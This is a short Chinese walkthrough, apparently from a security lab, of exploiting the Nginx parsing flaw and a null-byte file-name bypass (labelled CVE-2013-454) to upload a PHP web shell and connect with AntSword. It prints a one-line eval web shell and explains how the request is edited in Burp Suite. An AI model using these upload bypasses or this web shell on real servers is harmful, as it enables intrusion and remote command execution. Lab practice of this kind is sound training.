nginx_parsing
到浏览器中访问网站
http://8.155.8.239:81/
我们写一个图片码 1.jpg
我们将写好的图片码上传
会得到我们上传文件的路径
我们访问一下
发现上传成功
我们利用 Nginx 解析漏洞
发现木马运行成功,接下来使用蚁剑连接我们的图片马
获取 shell 成功
CVE-2013-454
我们还是到浏览器中访问网站
我们写一个 一句话木马文件 名字为 1.php
我们在网站中上传一下
上传被拦截,我们使用 bp 抓包修改文件后缀名为.jpg 进行上传并且再后面加上空格
然后我们再 jpg 后面加上两个空格再给上.php,再将十六进制中的第二个 20 修改为 00
进行文件上传
上传成功,我们访问一下
我们访问不到,这时我们 bp 是抓不到 2.jpg 这个静态页面的,因为它没有交互
这时随便访问个页面使用 bp 抓包,我这里访问的是 2.j
我们将数据包的网址改为我们要访问的 2.jpg 两个空格.php 继续到十六进制中改 20 为 00
然后放行访问
我们访问到了,但是虽然说木马上传成功但是我们这样是没有办法使用蚁剑连接的
所以我们要修改一下木马
这个木马的效果是访问成功后会自动在目录中生成一个 shell.php 文件,内容为<?php eval($_POST["cmd"]);?>
我们再用之前的方法访问一下 2.jpg
这是我们访问一下 shell.php,查看有没有生成成功
访问成功,使用蚁剑连接
得到 shell